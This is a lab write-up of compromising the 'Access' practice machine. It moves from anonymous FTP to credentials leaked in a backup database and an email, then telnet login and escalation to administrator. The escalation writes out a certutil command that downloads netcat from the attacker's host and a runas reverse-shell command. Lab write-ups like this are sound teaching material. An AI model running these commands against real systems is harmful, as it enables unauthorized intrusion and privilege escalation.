Initial Nmap
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Telnet page:
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login:
The webpage is just a picture of a data center. Dirbust with ffuf returned:
aspnet_client/system_web/
FTP anonymous access allowed with a backup directory containing a Microsoft access file “backup.mdb“. The Engineer directory found a password protected zip file called “Access Control.zip“
Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:sweps): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18 09:16PM <DIR> Backups
08-24-18 10:00PM <DIR> Engineer
226 Transfer complete.
ftp> cd Backups
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18 09:16PM 5652480 backup.mdb
226 Transfer complete.
ftp> binary
200 Type set to I.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
5652480 bytes received in 6.42 secs (860.3073 kB/s)
ftp> get "Access Control.zip"
local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete
backup.mdb contains a table named “auth user” with a password inside for the engineer. “access4u@security“
Opened the zip file using “access4u@security” as the password. The zip file contained a .pst file “Access Control.pst“. Reading the file with readpst finds and email from john with the password for the security account:
Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
Credentials do not work for ftp access so try the telnet account we enumerated in the nmap scan:
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>
Quick sysinfo
Host Name: ACCESS
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84191
Original Install Date: 8/21/2018, 9:43:10 PM
System Boot Time: 10/15/2021, 11:13:38 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz
[02]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Checking for stored credentials:
C:\Users\security>cmdkey /list
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
Stored Administrator credentials. We can use run as to pop a reverse netcat shell.
Transfer netcat with certutil:
certutil -urlcache -f http://10.10.14.27:443/nc.exe nc.exe
Run it as administrator using the saved credentials:
C:\temp>C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred “nc.exe 10.10.14.27 4444 -e cmd.exe“
Catch the shell:
connect to [10.10.14.27] from (UNKNOWN) [10.10.10.98] 49161
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
access\administrator
Mitigations
Do not allow anonymous access to ftp shares. Disable telnet and use SSH. Do not store administrator credentials. Stored credentials can be ran using runas.exe as demonstrated.